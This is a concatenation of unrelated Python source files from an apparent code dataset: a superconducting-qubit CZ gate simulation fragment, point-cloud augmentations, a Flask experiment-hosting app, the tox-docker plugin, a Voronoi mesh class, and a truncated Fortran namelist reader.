            T2_q0_vec=expT2(f_pulse_convolved_new/(2*np.pi),T2_q0_amplitude_dependent[0],T2_q0_amplitude_dependent[1],T2_q0_amplitude_dependent[2])
            Tphi01_q0_vec = Tphi_from_T1andT2(T1_q0,T2_q0_vec)
            c_ops = c_ops_interpolating(T1_q0,T1_q1,Tphi01_q0_vec,Tphi01_q1)
        else:
            def omega_prime(omega):  # derivative of f_pulse
                '''
                frequency is w = w_0 * cos(phi_e/2) where phi_e is the external flux through the SQUID.
                So the derivative wrt phi_e is
                w_prime = - w_0/2 sin(phi_e/2) = - w_0/2 * sqrt(1-cos(phi_e/2)**2) = - w_0/2 * sqrt(1-(w/w_0)**2)
                Note: no need to know what phi_e is.
                '''
                return np.abs((w_q0/2)*np.sqrt(1-(omega/w_q0)**2))  # we actually return the absolute value because it's the only one who matters later
            if Tphi01_q0_interaction_point != 0:  # mode where the pure dephazing is amplitude-dependent
                w_min = np.nanmin(f_pulse_convolved_new)
                omega_prime_min = omega_prime(w_min)
                # clip to [0, w_q0] so the sqrt in omega_prime stays real
                f_pulse_convolved_new=np.clip(f_pulse_convolved_new,0,w_q0)
                f_pulse_convolved_new_prime = omega_prime(f_pulse_convolved_new)
                Tphi01_q0_vec = Tphi01_q0_sweetspot - f_pulse_convolved_new_prime/omega_prime_min*(Tphi01_q0_sweetspot-Tphi01_q0_interaction_point)
                # we interpolate Tphi from the sweetspot to the interaction point (=worst point in terms of Tphi)
                # by weighting depending on the derivative of f_pulse compared to the derivative at the interaction point
                c_ops = c_ops_interpolating(T1_q0,T1_q1,Tphi01_q0_vec,Tphi01_q1)
            else:  # mode where the collapse operators are time-independent, and possibly are 0
                c_ops=jump_operators(T1_q0,T1_q1,0,0,0,0,0,
                    Tphi01_q0_sweetspot,Tphi01_q0_sweetspot,Tphi01_q0_sweetspot/2,Tphi01_q1,Tphi01_q1,Tphi01_q1/2)
        # --- time evolution and figures of merit ---
        qoi = simulate_quantities_of_interest_superoperator(
            H_0=self.H_0,
            tlist=tlist_new, c_ops=c_ops, w_bus=self.noise_parameters_CZ.w_bus(), eps_vec=eps_vec_convolved_new,
            sim_step=sim_step_new, verbose=False)
        cost_func_val = -np.log10(1-qoi['avgatefid_compsubspace_pc'])  # new cost function: infidelity
        #np.abs(qoi['phi_cond']-180) + qoi['L1']*100 * 5
        return cost_func_val, qoi['phi_cond'], qoi['L1']*100, qoi['L2']*100, qoi['avgatefid_pc']*100, qoi['avgatefid_compsubspace_pc']*100
    def get_f_pulse_double_sided(self):
        """Build the double-sided ("net-zero") CZ pulse from two half pulses
        and return (f_pulse, amp), each the concatenation of the two halves."""
        half_CZ_A = wf.martinis_flux_pulse(
            length=self.fluxlutman.cz_length()*self.fluxlutman.czd_length_ratio(),
            lambda_2=self.fluxlutman.cz_lambda_2(),
            lambda_3=self.fluxlutman.cz_lambda_3(),
            theta_f=self.fluxlutman.cz_theta_f(),
            f_01_max=self.fluxlutman.cz_freq_01_max(),
            J2=self.fluxlutman.cz_J2(),
            # E_c=self.fluxlutman.cz_E_c(),
            f_interaction=self.fluxlutman.cz_freq_interaction(),
            sampling_rate=self.fluxlutman.sampling_rate(),
            return_unit='f01')
        half_amp_A = self.fluxlutman.detuning_to_amp(
            (self.fluxlutman.cz_freq_01_max() - half_CZ_A)/(2*np.pi))
        # first half is mapped to positive voltage
        # NOTE: negative part of the flux arc is ignored
        # Generate the second CZ pulse. If the params are np.nan, default
        # to the main parameter
        if not np.isnan(self.fluxlutman.czd_theta_f()):
            d_theta_f = self.fluxlutman.czd_theta_f()
        else:
            d_theta_f = self.fluxlutman.cz_theta_f()
        if not np.isnan(self.fluxlutman.czd_lambda_2()):
            d_lambda_2 = self.fluxlutman.czd_lambda_2()
        else:
            d_lambda_2 = self.fluxlutman.cz_lambda_2()
        if not np.isnan(self.fluxlutman.czd_lambda_3()):
            d_lambda_3 = self.fluxlutman.czd_lambda_3()
        else:
            d_lambda_3 = self.fluxlutman.cz_lambda_3()
        half_CZ_B = wf.martinis_flux_pulse(
            length=self.fluxlutman.cz_length()*(1-self.fluxlutman.czd_length_ratio()),
            lambda_2=d_lambda_2,
            lambda_3=d_lambda_3,
            theta_f=d_theta_f,
            f_01_max=self.fluxlutman.cz_freq_01_max(),
            J2=self.fluxlutman.cz_J2(),
            f_interaction=self.fluxlutman.cz_freq_interaction(),
            sampling_rate=self.fluxlutman.sampling_rate(),
            return_unit='f01')
        half_amp_B = self.fluxlutman.detuning_to_amp(
            (self.fluxlutman.cz_freq_01_max() - half_CZ_B)/(2*np.pi), positive_branch=False)
        # second half is mapped to negative voltage
        # NOTE: negative part of the flux arc is ignored
        # N.B. No amp scaling and offset present
        f_pulse = np.concatenate([half_CZ_A, half_CZ_B])
        amp = np.concatenate([half_amp_A, half_amp_B])
        return f_pulse,amp
# ---- end of record (dataset-export separator; commented out so the file parses) ----
import numpy as np
def get_augmentations_from_list(str_list, upright_axis=2):
'''
:param str_list: List of string indicating the augmentation type
:param upright_axis: Set to 1 for modelnet (i.e. y-axis is vertical axis), but 2 otherwise (i.e. z-axis)
:return:
'''
if str_list is None:
return []
augmentations = []
if 'Rotate1D' in str_list:
if upright_axis == 1:
augmentations.append(RotateY())
elif upright_axis == 2:
augmentations.append(RotateZ())
if 'Jitter' in str_list:
augmentations.append(Jitter())
if 'Scale' in str_list:
augmentations.append(Scale())
if 'RotateSmall' in str_list:
augmentations.append(RotateSmall())
if 'Shift' in str_list:
augmentations.append(Shift())
return augmentations
class Augmentation(object):
    """Base class for point-cloud augmentations.

    Subclasses override apply(), which takes an array of points (last axis of
    size 3) and returns the augmented array (possibly modified in place).
    """
    def apply(self, data):
        # subclasses must implement this
        raise NotImplementedError
class Jitter(Augmentation):
    """Add small clipped-Gaussian positional noise to every point."""

    def __init__(self, sigma=0.01, clip=0.05):
        # sigma: std-dev of the Gaussian noise; clip: absolute noise bound
        self.sigma = sigma
        self.clip = clip

    def apply(self, data):
        assert self.clip > 0
        noise = self.sigma * np.random.randn(*data.shape)
        noise = np.clip(noise, -1 * self.clip, self.clip)
        # returns a new array; the input is left untouched
        return noise + data
class Shift(Augmentation):
    """Translate the whole cloud by a random per-axis offset (in place)."""

    def __init__(self, shift_range=0.1):
        self.shift_range = shift_range

    def apply(self, data):
        offset = np.random.uniform(-self.shift_range, self.shift_range, 3)
        # in-place: the caller's array is shifted too
        data += offset
        return data
class RotateZ(Augmentation):
    """Random rotation about the Z (vertical) axis."""

    def apply(self, data):
        angle = np.random.uniform() * 2 * np.pi
        c, s = np.cos(angle), np.sin(angle)
        rotation = np.array([[c, s, 0],
                             [-s, c, 0],
                             [0, 0, 1]])
        # points are row vectors, so the rotation is applied on the right
        return np.dot(data, rotation)
class RotateY(Augmentation):
    """Random rotation about the Y axis (the vertical axis for ModelNet)."""

    def apply(self, data):
        angle = np.random.uniform() * 2 * np.pi
        c, s = np.cos(angle), np.sin(angle)
        rotation = np.array([[c, 0, s],
                             [0, 1, 0],
                             [-s, 0, c]])
        # points are row vectors, so the rotation is applied on the right
        return np.dot(data, rotation)
class RotateSmall(Augmentation):
    """Small random rotation about all three axes (clipped Gaussian angles)."""

    def __init__(self, angle_sigma=0.06, angle_clip=0.18):
        # angle_sigma: std-dev of each axis angle; angle_clip: absolute bound
        self.angle_sigma = angle_sigma
        self.angle_clip = angle_clip

    def apply(self, data):
        ax, ay, az = np.clip(self.angle_sigma * np.random.randn(3),
                             -self.angle_clip, self.angle_clip)
        Rx = np.array([[1, 0, 0],
                       [0, np.cos(ax), -np.sin(ax)],
                       [0, np.sin(ax), np.cos(ax)]])
        Ry = np.array([[np.cos(ay), 0, np.sin(ay)],
                       [0, 1, 0],
                       [-np.sin(ay), 0, np.cos(ay)]])
        Rz = np.array([[np.cos(az), -np.sin(az), 0],
                       [np.sin(az), np.cos(az), 0],
                       [0, 0, 1]])
        # combined rotation applied to row-vector points: data @ (Rz Ry Rx)
        return np.dot(data, np.dot(Rz, np.dot(Ry, Rx)))
class RotateZLarge_(Augmentation):
    '''
    Applies a random rotation about the Z axis only, with the angle drawn
    like RotateSmall's per-axis angles (clipped Gaussian). Unlike the other
    augmentations, apply() returns a tuple: the rotated data AND the
    transpose (= inverse) of the rotation matrix used.
    '''
    def __init__(self, angle_sigma=0.06, angle_clip=0.18):
        # angle_sigma: std-dev of each drawn angle; angle_clip: absolute bound
        self.angle_sigma = angle_sigma
        self.angle_clip = angle_clip
    def apply(self, data):
        # three angles are drawn (matching RotateSmall's RNG usage), but only
        # the Z angle (angles[2]) is actually used
        angles = np.clip(self.angle_sigma * np.random.randn(3), -self.angle_clip, self.angle_clip)
        Rz = np.array([[np.cos(angles[2]), -np.sin(angles[2]), 0],
                       [np.sin(angles[2]), np.cos(angles[2]), 0],
                       [0, 0, 1]])
        R = Rz  # only the Z rotation is applied
        rotated_data = np.dot(data, R)
        return rotated_data, R.T
class Scale(Augmentation):
    """Uniformly scale the whole cloud by a random factor (in place)."""

    def __init__(self, scale_low=0.8, scale_high=1.25):
        self.scale_low = scale_low
        self.scale_high = scale_high

    def apply(self, data, keypoints=None):
        # keypoints is accepted for interface compatibility but unused here
        factor = np.random.uniform(self.scale_low, self.scale_high)
        # in-place: the caller's array is scaled too
        data *= factor
        return data
# ---- end of record (dataset-export separator; commented out so the file parses) ----
# <reponame>mwetzel7r/webrunner<gh_stars>0  (dataset-export metadata, not Python code; commented out)
# python standard lib
import json, os, uuid
# external resources
from flask import Flask, redirect, url_for, request, render_template, make_response, jsonify,send_from_directory, flash
from flask_login import current_user, login_user, logout_user, login_required, login_manager
from flask_sqlalchemy import SQLAlchemy
# internal resources
from app import app, db, ops, forms
from app.models import Participant, Name
import config
# - - - - - - - - - - - - - -
# Default Pages
# - - - - - - - - - - - - - -
@app.route('/', methods = ['GET', 'POST'])
def main():
    """Landing page: collect consent, create the participant, log them in
    and redirect to their first experiment.

    GET renders the consent form; a valid POST creates the Participant and
    Name rows, assigns a condition, and redirects to load_exp.
    """
    # Mobile browsers are redirected away (study is desktop-only).
    if request.user_agent.platform in ['iphone', 'android']:
        return render_template('errors/_mobileRedirect_.html')
    form = forms.ConsentForm()
    if form.validate():
        # Create Participant + Name rows and archive the signed consent form.
        participant, name = ops.new_user(form.name.data)
        ops.save_consent_form(name.name)
        # Assign the next available experiment/condition, then persist
        # before logging the participant in.
        exp, condition = ops.get_next_experiment_condition(participant)
        participant.condition = condition
        db.session.commit()
        login_user(participant)
        # `status` is an index into the participant's ordered experiment list.
        first_exp = json.loads(participant.experiments)[int(participant.status)]
        return redirect(url_for('load_exp', exp = first_exp))
    return render_template('_startpage_.html', form = form)
# Exit Survey & Debriefing Page
@app.route("/_exit_", methods = ['GET', 'POST'])
# @login_required
def exit_page():
    """Exit survey / debriefing page.

    A valid POST writes the survey answers to an anonymised text file and
    redirects to the final message page; otherwise the survey is rendered.
    """
    form = forms.DebriefForm()
    if not form.validate():
        return render_template('_exitpage_.html', form = form, show_exit_survey = config.show_exit_survey)
    # Pick an anonymous file name that is not already taken.
    misc_id = uuid.uuid4()
    while str(misc_id) + '.txt' in os.listdir('data/_exitsurveys_/'):
        misc_id = uuid.uuid4()
    survey_path = os.path.join('data/_exitsurveys_/', str(misc_id) + '.txt')
    with open(survey_path, 'w') as survey_file:
        for field in form:
            # Skip the CSRF token; everything else is a survey answer.
            if field.id != 'csrf_token':
                print(field, file = survey_file)
    return redirect(url_for('finalmessage_page'))
# If they choose to exit
@app.route("/_noconsent_exit_")
def noconsent_exit():
    """Shown when the participant declines to give consent."""
    template = '_noconsent_exit_.html'
    return render_template(template)
# Final Message
@app.route("/_finalmessage_")
# @login_required
def finalmessage_page():
    """Log the participant out and show the final message.

    When SONA integration is enabled, the template is also handed the link
    used to assign course credit automatically.
    """
    logout_user()
    # Idiom fix: test truthiness instead of `== True`.
    if config.SONA:
        return render_template('_finalmessage_.html', assign_SONA_credit = True, SONA_link = config.SONA_link)
    else:
        return render_template('_finalmessage_.html')
# Cheater Message (if automatic credit assignment didn't work)
@app.route("/_crediterror_")
def creditassignerror_page():
    """Shown when automatic SONA credit assignment did not work."""
    template = 'errors/_creditassignerror_.html'
    return render_template(template)
@app.route("/_misc_err_")
def misc_err_page():
    """Generic catch-all error page."""
    template = 'errors/_misc_err_.html'
    return render_template(template)
@app.route("/_iei_")
def transition_page():
    """Inter-experiment transition page (instructions are placeholder text)."""
    template = '_transitionpage_.html'
    return render_template(template, instructions = 'Hey')
# - - - - - - - - - - - - - -
# Experiment Pages (dynamically add routes based on experiments in the config file)
# - - - - - - - - - - - - - -
# from: http://www.compjour.org/lessons/flask-single-page/multiple-dynamic-routes-in-flask/
@app.route('/<exp>')
# @login_required
def load_exp(exp):
    """Serve the template of an active experiment; 404 for anything else."""
    # Only experiments listed as active in the config may be loaded.
    if exp not in config.active:
        return render_template('errors/404.html')
    template = os.path.join('experiments/', config.experiments[exp]['template'])
    return render_template(template)
# - - - - - - - - - - - - - -
# Operations (routes that lead to some server action being done)
# - - - - - - - - - - - - - -
@app.route('/_next_', methods=['POST'])
# @login_required
def next():
    """Advance the logged-in participant to their next experiment.

    Saves the posted experiment data, increments the participant's status,
    and returns a JSON payload naming the page the client should load next.
    NOTE: shadows the builtin ``next``; kept because the Flask endpoint name
    is derived from the function name.
    """
    message = request.get_json()
    # Idiom fix: was `current_user.is_authenticated == False`.
    if not current_user.is_authenticated:
        return make_response(
            json.dumps({
                'next_page': '/_misc_err_',
            })
        )
    if current_user.status == 'finished':
        return make_response(
            json.dumps({
                'next_page': '/_finalmessage_',
            })
        )
    else:
        ## save subject data
        current_exp = json.loads(current_user.experiments)[int(current_user.status)]
        ops.save_subject_data(
            os.path.join('data/experiments', config.experiments[current_exp]['data'], str(current_user.id)),
            message,
        )
        ## update databases
        current_user.status = int(current_user.status) + 1
        # Keep the Name row (looked up via the encrypted link) in sync.
        name = db.session.query(Name).filter_by(
            id = ops.decrypt_name(current_user.temp_name_link)
        ).first()
        name.status = current_user.status
        ## get next exp to run
        if int(current_user.status) >= len(json.loads(current_user.experiments)):
            # All experiments done: mark finished and send to the exit survey.
            current_user.status = 'finished'
            name.status = current_user.status
            current_user.condition = '_done_'
            next_page = '/_exit_'
        else:
            exp, condition = ops.get_next_experiment_condition(current_user)
            current_user.condition = condition
            next_page = '/_iei_?next_exp=' + exp
        db.session.commit() # <-- commit changes to db
        return make_response(
            json.dumps({
                'next_page': next_page,
            })
        )
|
import os
import re
import socket
import sys
import time
from tox import hookimpl
from tox.config import SectionReader
import py
from docker.errors import ImageNotFound
from docker.types import Mount
import docker as docker_module
# nanoseconds in a second; named "SECOND" so that "1.5 * SECOND" makes sense
SECOND = 1000000000
class HealthCheckFailed(Exception):
    """Raised when a container's Docker health check reports 'unhealthy'."""
def escape_env_var(varname):
    """
    Convert a string to a form suitable for use as an environment variable.

    The result will be all uppercase, and will have all invalid characters
    replaced by an underscore, so that it matches the regex
    [a-zA-Z_][a-zA-Z0-9_]*

    Example:
        "my.private.registry/cat/image" will become
        "MY_PRIVATE_REGISTRY_CAT_IMAGE"
    """
    # Robustness fix: the original indexed varname[0] unconditionally and
    # raised IndexError on ""; a bare "_" still satisfies the documented regex.
    if not varname:
        return "_"
    chars = list(varname.upper())
    # The first character must be a letter or underscore (digits are valid
    # only from the second character onward).
    if not chars[0].isalpha():
        chars[0] = "_"
    return "".join(c if c.isalnum() or c == "_" else "_" for c in chars)
def _newaction(venv, message):
    # Create a tox reporter "action" for *venv*, across tox API versions.
    # The try/except dispatch is deliberate: it falls back whenever the
    # new-style attribute (or the call into it) raises AttributeError.
    try:
        # tox 3.7 and later
        return venv.new_action(message)
    except AttributeError:
        # older tox: actions are created through the session object
        return venv.session.newaction(venv, message)
def _get_gateway_ip(container):
gateway = os.getenv("TOX_DOCKER_GATEWAY")
if gateway:
ip = socket.gethostbyname(gateway)
elif sys.platform == "darwin":
# https://docs.docker.com/docker-for-mac/networking/#use-cases-and-workarounds:
# there is no bridge network available in Docker for Mac, and exposed ports are
# made available on localhost (but 0.0.0.0 works just as well)
ip = "0.0.0.0"
else:
ip = container.attrs["NetworkSettings"]["Gateway"] or "0.0.0.0"
return ip
@hookimpl # noqa: C901
def tox_configure(config): # noqa: C901
    """Parse every ``[docker:NAME]`` section of tox.ini, validate it, and
    stash the result on the tox config as ``config._docker_container_configs``.
    """

    def getfloat(reader, key):
        # Read `key` as a float; None when absent, ValueError when malformed.
        val = reader.getstring(key)
        if val is None:
            return None
        try:
            return float(val)
        except ValueError:
            msg = f"{val!r} is not a number (for {key} in [{reader.section_name}])"
            raise ValueError(msg)

    def gettime(reader, key):
        # Read `key` as seconds and convert to integer nanoseconds
        # (docker's healthcheck API expects nanoseconds).
        return int(getfloat(reader, key) * SECOND)

    def getint(reader, key):
        # Read `key` as an exact integer (rejects e.g. "2.5").
        raw = getfloat(reader, key)
        val = int(raw)
        if val != raw:
            msg = f"{val!r} is not an int (for {key} in [{reader.section_name}])"
            raise ValueError(msg)
        return val

    def getenvdict(reader, key):
        # Parse "NAME=value" lines under `key` into a dict.
        environment = {}
        for value in reader.getlist(key):
            envvar, _, value = value.partition("=")
            environment[envvar] = value
        return environment

    # discover container configs
    inipath = str(config.toxinipath)
    iniparser = py.iniconfig.IniConfig(inipath)
    container_configs = {}
    for section in iniparser.sections:
        if not section.startswith("docker:"):
            continue
        _, _, container_name = section.partition(":")
        # Container names must be valid docker identifiers.
        if not re.match(r"^[a-zA-Z][-_.a-zA-Z0-9]+$", container_name):
            raise ValueError(f"{container_name!r} is not a valid container name")
        # populated in the next loop
        container_configs[container_name] = {}

    # validate command line options
    for container_name in config.option.docker_dont_stop:
        if container_name not in container_configs:
            raise ValueError(
                f"Container {container_name!r} not found (from --docker-dont-stop)"
            )

    # validate tox.ini
    for section in iniparser.sections:
        if not section.startswith("docker:"):
            continue
        reader = SectionReader(section, iniparser)
        # Make the usual tox path substitutions available in values.
        reader.addsubstitutions(
            distdir=config.distdir,
            homedir=config.homedir,
            toxinidir=config.toxinidir,
            toxworkdir=config.toxworkdir,
        )
        _, _, container_name = section.partition(":")
        container_configs[container_name].update(
            {
                "image": reader.getstring("image"),
                "stop": container_name not in config.option.docker_dont_stop,
            }
        )
        # Every key below is optional; only present keys are recorded.
        if reader.getstring("environment"):
            env = getenvdict(reader, "environment")
            container_configs[container_name]["environment"] = env
        if reader.getstring("healthcheck_cmd"):
            container_configs[container_name]["healthcheck_cmd"] = reader.getstring(
                "healthcheck_cmd"
            )
        if reader.getstring("healthcheck_interval"):
            container_configs[container_name]["healthcheck_interval"] = gettime(
                reader, "healthcheck_interval"
            )
        if reader.getstring("healthcheck_timeout"):
            container_configs[container_name]["healthcheck_timeout"] = gettime(
                reader, "healthcheck_timeout"
            )
        if reader.getstring("healthcheck_start_period"):
            container_configs[container_name]["healthcheck_start_period"] = gettime(
                reader, "healthcheck_start_period"
            )
        if reader.getstring("healthcheck_retries"):
            container_configs[container_name]["healthcheck_retries"] = getint(
                reader, "healthcheck_retries"
            )
        if reader.getstring("ports"):
            container_configs[container_name]["ports"] = reader.getlist("ports")
        if reader.getstring("links"):
            container_configs[container_name]["links"] = dict(
                _validate_link_line(link_line, container_configs.keys())
                for link_line in reader.getlist("links")
                if link_line.strip()
            )
        if reader.getstring("volumes"):
            container_configs[container_name]["mounts"] = [
                _validate_volume_line(volume_line)
                for volume_line in reader.getlist("volumes")
                if volume_line.strip()
            ]

    config._docker_container_configs = container_configs
def _validate_port(port_line):
host_port, _, container_port_proto = port_line.partition(":")
host_port = int(host_port)
container_port, _, protocol = container_port_proto.partition("/")
container_port = int(container_port)
if protocol.lower() not in ("tcp", "udp"):
raise ValueError("protocol is not tcp or udp")
return (host_port, container_port_proto)
def _validate_link_line(link_line, container_names):
other_container_name, sep, alias = link_line.partition(":")
if sep and not alias:
raise ValueError(f"Link '{other_container_name}:' missing alias")
if other_container_name not in container_names:
raise ValueError(f"Container {other_container_name!r} not defined")
return other_container_name, alias or other_container_name
def _validate_volume_line(volume_line):
parts = volume_line.split(":")
if len(parts) != 4:
raise ValueError(f"Volume {volume_line!r} is malformed")
if parts[0] != "bind":
raise ValueError(f"Volume {volume_line!r} type must be 'bind:'")
if parts[1] not in ("ro", "rw"):
raise ValueError(f"Volume {volume_line!r} options must be 'ro' or 'rw'")
volume_type, mode, outside, inside = parts
if not os.path.exists(outside):
raise ValueError(f"Volume source {outside!r} does not exist")
if not os.path.isabs(outside):
raise ValueError(f"Volume source {outside!r} must be an absolute path")
if not os.path.isabs(inside):
raise ValueError(f"Mount point {inside!r} must be an absolute path")
return Mount(
source=outside, target=inside, type=volume_type, read_only=bool(mode == "ro"),
)
@hookimpl # noqa: C901
def tox_runtest_pre(venv): # noqa: C901
    """Pull, start, and health-check every container the testenv asked for,
    then export HOST/PORT environment variables for the test run.
    """
    envconfig = venv.envconfig
    if not envconfig.docker:
        return

    config = envconfig.config
    container_configs = config._docker_container_configs

    docker = docker_module.from_env(version="auto")
    action = _newaction(venv, "docker")

    # Pass 1: validate the requested names and pull any missing images.
    seen = set()
    for container_name in envconfig.docker:
        if container_name not in container_configs:
            raise ValueError(f"Missing [docker:{container_name}] in tox.ini")
        if container_name in seen:
            raise ValueError(f"Container {container_name!r} specified more than once")
        seen.add(container_name)

        image = container_configs[container_name]["image"]
        name, _, tag = image.partition(":")
        try:
            docker.images.get(image)
        except ImageNotFound:
            action.setactivity("docker", f"pull {image!r} (from {container_name!r})")
            with action:
                docker.images.pull(name, tag=tag or None)

    # Pass 2: start each container (in the order listed, so links resolve).
    envconfig._docker_containers = {}
    for container_name in envconfig.docker:
        container_config = container_configs[container_name]

        # Assemble the optional healthcheck dict; None disables it entirely.
        hc_cmd = container_config.get("healthcheck_cmd")
        hc_interval = container_config.get("healthcheck_interval")
        hc_timeout = container_config.get("healthcheck_timeout")
        hc_retries = container_config.get("healthcheck_retries")
        hc_start_period = container_config.get("healthcheck_start_period")

        healthcheck = {}
        if hc_cmd:
            healthcheck["test"] = ["CMD-SHELL", hc_cmd]
        if hc_interval:
            healthcheck["interval"] = hc_interval
        if hc_timeout:
            healthcheck["timeout"] = hc_timeout
        if hc_start_period:
            healthcheck["start_period"] = hc_start_period
        if hc_retries:
            healthcheck["retries"] = hc_retries

        if healthcheck == {}:
            healthcheck = None

        # Merge multiple host ports mapped to the same container port/proto.
        ports = {}
        for port_mapping in container_config.get("ports", []):
            host_port, container_port_proto = _validate_port(port_mapping)
            existing_ports = set(ports.get(container_port_proto, []))
            existing_ports.add(host_port)
            ports[container_port_proto] = list(existing_ports)

        # Resolve links against already-started containers.
        links = {}
        for other_container_name, alias in container_config.get("links", {}).items():
            other_container = envconfig._docker_containers[other_container_name]
            links[other_container.id] = alias

        image = container_config["image"]
        environment = container_config.get("environment", {})

        action.setactivity("docker", f"run {image!r} (from {container_name!r})")
        with action:
            container = docker.containers.run(
                image,
                detach=True,
                environment=environment,
                healthcheck=healthcheck,
                labels={"tox_docker_container_name": container_name},
                links=links,
                name=container_name,
                ports=ports,
                # With no explicit ports, let docker publish all exposed ones.
                publish_all_ports=len(ports) == 0,
                mounts=container_config.get("mounts", []),
            )

        envconfig._docker_containers[container_name] = container
        container.reload()

    # Pass 3: wait for health checks, then export env vars for the tests.
    for container_name, container in envconfig._docker_containers.items():
        image = container.attrs["Config"]["Image"]
        if "Health" in container.attrs["State"]:
            action.setactivity(
                "docker", f"health check {image!r} (from {container_name!r})"
            )
            with action:
                # Poll until docker reports a terminal health state.
                while True:
                    container.reload()
                    health = container.attrs["State"]["Health"]["Status"]
                    if health == "healthy":
                        break
                    elif health == "starting":
                        time.sleep(0.1)
                    elif health == "unhealthy":
                        # the health check failed after its own timeout
                        stop_containers(venv)
                        msg = f"{image!r} (from {container_name!r}) failed health check"
                        venv.status = msg
                        raise HealthCheckFailed(msg)

        gateway_ip = _get_gateway_ip(container)
        for containerport, hostports in container.attrs["NetworkSettings"][
            "Ports"
        ].items():
            if hostports is None:
                # The port is exposed by the container, but not published.
                continue

            # Use the wildcard-bound mapping; skip ports bound elsewhere.
            for spec in hostports:
                if spec["HostIp"] == "0.0.0.0":
                    hostport = spec["HostPort"]
                    break
            else:
                continue

            # e.g. MYCONTAINER_HOST and MYCONTAINER_5432_TCP_PORT.
            envvar = escape_env_var(f"{container_name}_HOST")
            venv.envconfig.setenv[envvar] = gateway_ip

            envvar = escape_env_var(f"{container_name}_{containerport}_PORT")
            venv.envconfig.setenv[envvar] = hostport
@hookimpl
def tox_runtest_post(venv):
    # tox hook: tear down any containers started for this venv's test run.
    stop_containers(venv)
def stop_containers(venv):
    """Remove every container started for *venv*, except those the user
    asked (via --docker-dont-stop) to leave running."""
    envconfig = venv.envconfig
    if not envconfig.docker:
        return

    container_configs = envconfig.config._docker_container_configs
    action = _newaction(venv, "docker")

    for name, container in envconfig._docker_containers.items():
        if container_configs[name]["stop"]:
            action.setactivity(
                "docker", f"remove '{container.short_id}' (from {name!r})"
            )
            with action:
                # Force-remove, including anonymous volumes.
                container.remove(v=True, force=True)
        else:
            action.setactivity(
                "docker",
                f"leave '{container.short_id}' (from {name!r}) running",
            )
            with action:
                pass
@hookimpl
def tox_addoption(parser):
    """Register tox-docker's testenv attribute and command-line flag."""
    # necessary to allow the docker= directive in testenv sections
    parser.add_testenv_attribute(
        name="docker",
        type="line-list",
        help="Name of docker images, including tag, to start before the test run",
        default=[],
    )

    # command line flag to keep docker containers running
    parser.add_argument(
        "--docker-dont-stop",
        default=[],
        action="append",
        metavar="CONTAINER",
        help=(
            "If specified, tox-docker will not stop CONTAINER after the test run. "
            "Can be specified multiple times."
        ),
    )
|
<filename>qtree/voronoi.py
import numpy as np
from matplotlib import pyplot as plt
from matplotlib.collections import LineCollection
from scipy.spatial import Voronoi
from qtree.utils import _points_in_poly
class ParticleVoronoiMesh(object):
    """A Voronoi mesh generated from 2D particle positions."""

    def __init__(self, positions, deposit_field, bounds):
        """A voronoi mesh generated from particle positions

        Parameters
        ----------
        positions : iterable of 2-element iterables
            Positions of the particles to be inserted.
        deposit_field : iterable or None
            Field to be deposited and pixelized. When given, must have the
            same number of elements as the number of positions.
        bounds : 2-element iterable of two-tuples
            The coordinates of the lower-left and upper-right corners
            of the bounds of the mesh. Particles outside the bounds are
            discarded.
        """
        positions = np.asarray(positions)
        self.num_particles = nparticles = positions.shape[0]
        self.bounds = bounds = np.asarray(bounds)
        if deposit_field is not None and nparticles != deposit_field.shape[0]:
            raise RuntimeError(
                "Received %s deposit_field entries but received %s particle "
                "positions" % (deposit_field.shape[0], nparticles))
        if positions.shape[-1] != 2:
            # BUG FIX: the original formatted two %s placeholders with a
            # one-element tuple, so this raise crashed with TypeError
            # instead of reporting the shape problem.
            raise RuntimeError(
                "Received %sD positions %s but expected 2D positions"
                % (positions.shape[-1], positions.shape))
        self.voro = voro = Voronoi(positions)
        self.deposit_field = deposit_field
        # Keep only finite ridges: index -1 marks a vertex at infinity.
        ridge_verts = np.array(voro.ridge_vertices)
        ridge_verts = ridge_verts[(ridge_verts != -1).all(axis=-1)]
        self.segments = voro.vertices[ridge_verts]

    def pixelize(self, image):
        """pixelize the deposit_field onto an image

        Parameters
        ----------
        image : 2D array
            Image to pixelize onto

        Returns
        -------
        The image array with each finite Voronoi cell filled with its
        particle's deposit_field value divided by the cell area.
        """
        image = np.asarray(image)
        if len(image.shape) != 2:
            raise RuntimeError("Must pixelize onto 2D image")
        voro = self.voro
        regions = voro.regions
        bounds = self.bounds
        # Pixel sizes and cell-centred sample coordinates over the bounds.
        dx = 1/image.shape[0]
        dy = 1/image.shape[1]
        xb = bounds[1, 0] - bounds[0, 0] - dx
        yb = bounds[1, 1] - bounds[0, 1] - dy
        xlin = np.arange(image.shape[0])/(image.shape[0] - 1) * xb + dx/2
        ylin = np.arange(image.shape[1])/(image.shape[1] - 1) * yb + dy/2
        x, y = np.meshgrid(xlin, ylin)
        for i, point_coord in enumerate(voro.points):
            region_idx = voro.point_region[i]
            region = regions[region_idx]
            # Skip unbounded (contains -1) or empty regions.
            if -1 in region or len(region) == 0:
                continue
            vertices = voro.vertices[region]
            vx = vertices[:, 0]
            vy = vertices[:, 1]
            # Shoelace formula for the polygon area.
            area = 0.5*np.abs(np.dot(vx, np.roll(vy, 1)) -
                              np.dot(vy, np.roll(vx, 1)))
            in_poly = _points_in_poly(vertices, x, y)
            image[np.where(in_poly)] = self.deposit_field[i] / area
        return image

    def plot(self, filename=None):
        """Plot the mesh; show it interactively when *filename* is None,
        otherwise save it to *filename*."""
        fig = plt.figure(figsize=(4, 4))
        axes = fig.add_axes([.01, .01, .98, .98])
        axes.set_aspect('equal')
        plt.axis('off')
        # Finite Voronoi ridges as thin black lines.
        lc = LineCollection(self.segments, color='k', linewidths=0.5)
        axes.add_collection(lc)
        positions = self.voro.points
        axes.scatter(positions[:, 0], positions[:, 1], s=.2, color='k',
                     marker='o')
        plt.xlim((0, 1))
        plt.ylim((0, 1))
        if filename is None:
            plt.show()
        else:
            plt.savefig(filename, dpi=400)
|
<filename>tcvx21/grillix_post/components/namelist_reader_m.py
"""
Implementation of a reader for Fortran namelist readers, which can be used to interface with parameter files
"""
from collections import defaultdict
from os import name
from pathlib import Path
import f90nml
from tempfile import NamedTemporaryFile
import fnmatch
def read_fortran_namelist(path: Path):
    """
    Fortran namelist reader, using the f90nml module.

    If the '+' character is detected in the source file, a temporary file is
    made which removes '+'. This prevents a possible error in the namelist
    reading.

    Returns the namelist contents converted (recursively) to defaultdicts.
    """
    assert path.exists()

    with open(path, "r") as file:
        contents = file.read()

    if "+" in contents:
        contents = contents.replace("+", "")
        temp_path = Path(NamedTemporaryFile(delete=False).name)
        with open(temp_path, "w") as temp_file:
            temp_file.write(contents)
